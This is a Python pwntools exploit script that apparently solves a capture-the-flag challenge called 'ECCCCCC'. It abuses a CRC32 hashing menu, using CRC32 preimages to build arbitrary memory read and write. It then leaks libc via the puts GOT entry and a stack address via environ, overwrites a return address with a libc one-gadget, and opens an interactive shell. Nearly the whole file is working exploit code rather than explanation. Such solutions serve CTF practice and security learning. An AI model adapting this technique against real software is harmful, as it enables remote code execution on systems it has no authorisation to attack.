ECCCCCC.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# this exploit was generated via
# 1) pwntools
# 2) ctfmate
import os | |
import time | |
import zlib | |
import pwn | |
import subprocess | |
SLEEP_TIME = 0.5  # seconds paused before each interaction with the target

# Target binary and the libc it ships with; context.binary also tells
# pwntools which architecture to pack/unpack values for.
exe = pwn.ELF('./ECCCCCC')
pwn.context.binary = exe
libc = pwn.ELF("./libc.so.6")

# Terminal used when a debugger is attached, and corefile handling.
pwn.context.terminal = ["tilix", "-t", "CTFMate", "-a", "session-add-right", "-e"]
pwn.context.delete_corefiles = True
pwn.context.rename_corefiles = False

# Remote endpoint; both can be overridden on the command line (HOST=... PORT=...).
host = pwn.args.HOST or 'ECCCCCC.pwn.so'
port = int(pwn.args.PORT or 65505)
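def local(argv=None, *a, **kw):
    '''Execute the target binary locally (under gdb when GDB=1 is given).

    argv: extra command-line arguments appended after the binary path
          (default: none).
    Remaining positional/keyword arguments are passed through to
    pwn.gdb.debug / pwn.process.  Returns the resulting tube.
    '''
    # None instead of a shared [] default so one call cannot leak
    # arguments into the next.
    argv = [] if argv is None else argv
    cmdline = [exe.path] + list(argv)
    if pwn.args.GDB:
        # gdbscript is the module-level gdb command string defined below.
        return pwn.gdb.debug(cmdline, *a, gdbscript=gdbscript, **kw)
    return pwn.process(cmdline, *a, **kw)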
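def remote(argv=None, *a, **kw):
    '''Connect to the process on the remote host.

    argv, *a and **kw are accepted only for signature parity with local()
    and are not used for a remote connection.  Returns the socket tube;
    when GDB=1 is given, gdb is attached to it first.
    '''
    # None instead of a mutable [] default (unused here, but keeps the
    # three start helpers consistent).
    io = pwn.connect(host, port)
    if pwn.args.GDB:
        pwn.gdb.attach(io, gdbscript=gdbscript)
    return io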
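def start(argv=None, *a, **kw):
    '''Start the exploit against the target.

    Uses a local process when LOCAL=1 is given, otherwise connects to
    host:port.  argv and the remaining arguments are forwarded to
    local() / remote().  Returns the tube.
    '''
    # None instead of a shared [] default so the list is fresh per call.
    argv = [] if argv is None else argv
    if pwn.args.LOCAL:
        return local(argv, *a, **kw)
    return remote(argv, *a, **kw)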
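# Commands fed to gdb when GDB=1 is given (see local()/remote()).
# Kept as a plain literal: the previous .format(**locals()) call had no
# placeholders to fill and would break on any gdb command containing braces.
gdbscript = '''
continue
'''
# Session handle to the target; assigned by start() below and used by the
# helpers in the exploit section.
io = None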
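def GetOffsetStdin():
    '''Return the offset within a 512-byte cyclic pattern at which the
    bytes that ended up in the faulting address were taken, after feeding
    the pattern to a local copy of the target on stdin.

    Returns the int offset found by pwn.cyclic_find.
    '''
    # Silence pwntools while the throwaway process crashes; context.local()
    # restores the previous log level even if something below raises (the
    # original only restored it on the success path).
    with pwn.context.local(log_level='critical'):
        p = pwn.process(exe.path)
        try:
            p.sendline(pwn.cyclic(512))
            p.wait()
            time.sleep(2)  # presumably waiting for the corefile to be written
            fault = p.corefile.fault_addr
            # cyclic_find matches a 4-byte slice, so only the low 32 bits
            # of the fault address are looked up.
            return pwn.cyclic_find(fault & 0xffffffff)
        finally:
            p.close()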
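def GetOffsetArgv():
    '''Return the offset within a 512-byte cyclic pattern at which the
    bytes that ended up in the faulting address were taken, after passing
    the pattern to a local copy of the target as its first argument.

    Returns the int offset found by pwn.cyclic_find.
    '''
    # Silence pwntools while the throwaway process crashes; context.local()
    # restores the previous log level even if something below raises (the
    # original only restored it on the success path).
    with pwn.context.local(log_level='critical'):
        p = pwn.process([exe.path, pwn.cyclic(512)])
        try:
            p.wait()
            time.sleep(2)  # presumably waiting for the corefile to be written
            fault = p.corefile.fault_addr
            # cyclic_find matches a 4-byte slice, so only the low 32 bits
            # of the fault address are looked up.
            return pwn.cyclic_find(fault & 0xffffffff)
        finally:
            p.close()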
# Open the session with the target (local process when LOCAL=1, otherwise a
# socket to host:port); every helper below talks through this handle.
io = start()
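def RevCRC32(hash):
    '''Return a bytearray of bytes whose CRC32 equals *hash*.

    Delegates to the external ./crc32.py tool
    (source : https://github.com/theonlypwner/crc32) and parses the
    "{0x.., 0x.., ...}" list printed on the first line of its output.
    The rest of this file relies on the result being exactly 4 bytes.

    Raises ValueError if the tool's output is not in the expected form
    (the original would instead raise an obscure slicing/int error).
    '''
    # NOTE(review): "python" is resolved from PATH; which interpreter that
    # is depends on the host.
    out = subprocess.check_output(["python", "./crc32.py", "reverse", hex(hash)])
    return _parse_crc32_reverse(out)


def _parse_crc32_reverse(out):
    '''Extract the "{...}" byte list from the first line of crc32.py output.'''
    first = out.split(b"\n", 1)[0]
    # Search the braces on the line that is actually sliced; the original
    # looked up "{" in the whole output but sliced only the first line.
    try:
        begin = first.index(b"{") + 1
        end = first.rindex(b"}")
    except ValueError:
        raise ValueError("unexpected crc32.py output: %r" % (out,)) from None
    return bytearray(int(v, 16) for v in first[begin:end].split(b","))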
# ===========================================================
# EXPLOIT GOES HERE
# ===========================================================
def ExOption(v):
    '''Choose menu option *v* (an int) at the target's "Option: " prompt.'''
    time.sleep(SLEEP_TIME)  # pace the interaction, see SLEEP_TIME
    choice = b"%d" % v
    io.sendlineafter(b"Option: ", choice)
def SetRegion(addr, len):
    '''Answer the target's "Begin: " / "Length: " prompts.

    addr is sent as a bare hex number, len as a decimal number.
    (The parameter name shadows the builtin len(); kept for callers.)
    '''
    time.sleep(SLEEP_TIME)  # pace the interaction, see SLEEP_TIME
    begin = b"%x" % addr
    length = b"%d" % len
    io.sendlineafter(b"Begin: ", begin)
    io.sendlineafter(b"Length: ", length)
def ArbRead(addr):
    '''Return the hash the target reports (option 1) for the 4 bytes at *addr*.

    The value after "hash: " is parsed as a hexadecimal int.
    '''
    ExOption(1)
    SetRegion(addr, 4)
    io.recvuntil(b"hash: ")
    reply = io.recvline()
    return int(reply, 16)
def WriteSingleByte(addr, b):
    '''Set the byte at *addr* to *b* through option 2.

    Reads the hash of the 4-byte window at addr, obtains a preimage of it
    via RevCRC32, replaces its first byte with b, and sends the CRC32 of
    the modified window as the "Correct hash".  Calls pwn.error (which
    raises) if the target does not acknowledge the write.
    '''
    window = RevCRC32(ArbRead(addr))
    window[0] = b
    wanted = zlib.crc32(window)
    ExOption(2)
    SetRegion(addr, 4)
    io.sendlineafter(b"Correct hash: ", b"%d" % wanted)
    # Compared verbatim against the target's reply (including its typo).
    reply = io.recvline()
    if reply != b"Succesfully corrected the data!\n":
        pwn.error("Failed to write 0x%x at 0x%x" % (b, addr))
def ArbWrite(addr, data):
    '''Write *data* (a bytes-like object) byte by byte starting at *addr*.

    Always returns 0; failures surface from WriteSingleByte.
    '''
    for offset, byte in enumerate(data):
        WriteSingleByte(addr + offset, byte)
    return 0
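def Leak(addr, size=8):
    '''Return the *size*-byte integer stored at *addr* on the target.

    size must be 8 or 4; the bytes are recovered 4 at a time through
    ArbRead + RevCRC32 and unpacked with pwntools' context endianness.
    Raises ValueError for any other size (the original silently returned
    None).
    '''
    if size == 8:
        low = RevCRC32(ArbRead(addr))
        high = RevCRC32(ArbRead(addr + 4))
        return pwn.u64(low + high)
    if size == 4:
        return pwn.u32(RevCRC32(ArbRead(addr)))
    raise ValueError("Leak: unsupported size %r (expected 4 or 8)" % (size,))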
# GOT slot of puts in the target; a fixed address hard-coded for this
# particular ./ECCCCCC build.
PUTS_GOT_ADDR = 0x403fc0
# Resolve the libc base from the leaked puts pointer.
libc.address = Leak(PUTS_GOT_ADDR) - libc.symbols['puts']
# Leak a stack address via libc's environ, then take a fixed distance below
# it as the slot to overwrite; 0x100 is assumed for this binary/run and is
# not derived here.
stack = Leak(libc.symbols.environ)
retaddr = stack - 0x100
pwn.info("Libc : 0x%x" % libc.address)
pwn.info("Stack : 0x%x" % stack)
pwn.info("retaddr : 0x%x" % retaddr)
# 0xe3b31 is a libc-relative offset specific to the bundled ./libc.so.6;
# it has to be recomputed for any other libc build.
ArbWrite(retaddr, pwn.p64(libc.address + 0xe3b31))
# Option 0 presumably leaves the menu; the session is then handed to the user.
ExOption(0)
io.interactive()